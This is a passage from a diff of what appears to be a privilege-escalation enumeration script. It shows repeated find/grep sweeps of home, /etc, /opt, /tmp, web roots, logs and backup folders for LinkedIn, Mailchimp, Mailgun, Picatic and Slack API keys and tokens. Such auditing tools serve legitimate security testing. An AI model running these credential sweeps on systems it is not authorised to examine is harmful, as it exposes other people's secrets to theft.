50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{12}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching LinkedIn Secret Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]~${SED_RED}~" & +print_3title_no_nl "Searching LinkedIn Secret Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "linkedin(.{0,20})?['\"][0-9a-z]{16}['\"]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Mailchamp API Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~[0-9a-f]{32}-us[0-9]{1,2}~${SED_RED}~" & +print_3title_no_nl "Searching Mailchamp API Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "[0-9a-f]{32}-us[0-9]{1,2}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Mailgun API Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~key-[0-9a-zA-Z]{32}~${SED_RED}~" & +print_3title_no_nl "Searching Mailgun API Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Picatic API Key (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~sk_live_[0-9a-z]{32}~${SED_RED}~" & +print_3title_no_nl "Searching Picatic API Key (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +fi wait -print_3title "Searching Slack Token (limited to 50)" -timeout 120 find $HOMESEARCH -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find /etc -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find /opt -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find /tmp -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find /private -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find /Applications -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find /var/www -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find /var/log -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find /private/var/log -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find /usr/local/www/ -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & -timeout 120 find $backup_folders_row -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 | sed -${E} "s~xox[baprs]-([0-9a-zA-Z]{10,48})?~${SED_RED}~" & +print_3title_no_nl "Searching Slack Token (limited to 50)..." +if [ "$SEARCH_IN_FOLDER" ]; then + timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & +else + timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /tmp -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/www -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /private/var/log -type f -not -path "*/node_modules/*" -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 & + timeout 120 find /usr/local/www/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE 